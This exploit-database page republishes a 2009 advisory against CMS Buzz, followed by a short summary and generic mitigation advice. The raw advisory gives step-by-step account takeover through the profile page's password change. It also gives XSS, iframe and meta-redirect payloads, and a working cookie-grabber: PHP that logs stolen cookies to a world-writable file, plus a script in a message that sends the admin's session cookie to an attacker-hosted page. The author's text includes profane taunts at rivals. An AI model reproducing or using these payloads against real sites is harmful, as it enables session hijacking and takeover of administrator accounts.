header-logo
Suggest Exploit
vendor:
CMS Buzz
by:
ThE g0bL!N
8,8
CVSS
HIGH
Cross-Site Scripting (XSS) & HTML Injection & Cookie Grabber Exploit
79 (XSS) & 89 (HTML Injection) & 522 (Cookie Grabber Exploit)
CWE
Product Name: CMS Buzz
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

CMS Buzz (xss/Change Password)Multiple Remote Vulnerabilities & Cookie Grabber Exploit & HTML Injection

A vulnerability in CMS Buzz allows an attacker to change the password of any user by accessing the profile page of the user. An attacker can also inject malicious JavaScript code into the search page of the website, which will be executed when a user visits the page. Additionally, an attacker can create two files, cookie.php and log.txt, and upload them to a web server. The cookie.php file contains code to grab the cookie of the user when they visit the page, and the log.txt file is used to store the cookie. The attacker can then send a message to the admin of the website with a malicious JavaScript code that will redirect the admin to the cookie.php page, thus allowing the attacker to grab the admin's cookie.

Mitigation:

To mitigate XSS, the application should validate all user input and encode output. To mitigate HTML injection, the application should validate all user input and encode output. To mitigate cookie grabber exploit, the application should use secure cookies and ensure that the cookie is only sent over HTTPS.
Source

Exploit-DB raw data:

#################################################################################################################
[+] CMS Buzz (xss/Change Password)Multiple Remote Vulnerabilities
[+] Discovered By ThE g0bL!N
[+] Vendor:cmsbuzz.com
[+] Note : If you are The S3r!0uS  I say To Fuck you Because You are Hacked  Site Of My Best Friends dz-boys.com
[+] Demo:http://demo.cmsbuzz.com/
[+] Greeting : All my freinds ( Dz )
#################################################################################################################
Remote Changing Password:
+++++++++++++++++++++++++
1) You Must Register In ThE site http://www.victim.com/?action=register
2) Login
3) Go To url:
    http:///www.victim.com/?action=profile&user= [ Name Of user ]
Example
http:///www.victim.com/?action=profile&user=admin
Change admin Password Then go To login http://path/?action=login
Cross Site Scritping
++++++++++++++++++++
http://www.victim.com/?action=search
<script>alert("xss")</script>

#################################################################################################################
[+] CMS Buzz Cookie Grabber Exploit& HTML Injection
[+] Discovered By ThE g0bL!N
[+] Vendor:http://msbuzz.com/
[+] Fuck You The S3r!0uS
#################################################################################################################
PoC
--
[+] Make 2 files and upload to your host :
[+]cookie.php  - > Put in this File That Code:
 <?php
 $cookie = $_GET['cookie'];
 $log = fopen("log.txt", "a");
 fwrite($log, $cookie ."\n");
 fclose($log);
 ?>
[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php
 
[+]Exploit:
   -------
1) Register in The SIte
2) Go to send message http://path/?action=compose
3)We Put in
  To:admin name
  Subject: Some Subject
  Message: <script>document.location ="http://localhost/[path]/cookie.php?cookie=" + document.cookie;</script>
  The js code Worked When The admin Read The Message
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2) HTML Injection
+++++++++++++++++
1) Register :p
2) Go to send message http://path/?action=compose
3)We Put in
  To:admin name
  Subject: Some Subject
  Message: 1)XSS:PoC :<script>alert("xss")</script>
             ---------
           2)Poc: Iframe :"><iframe src=http://www.google.com/></iframe>
       -------------
     3)PoC : Redirection:">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""
     -------------------
     DEMO:http://demo.cmsbuzz.com
################################################################################################################

# milw0rm.com [2009-06-18]

Navigation

Suggest Exploit

Services By CQR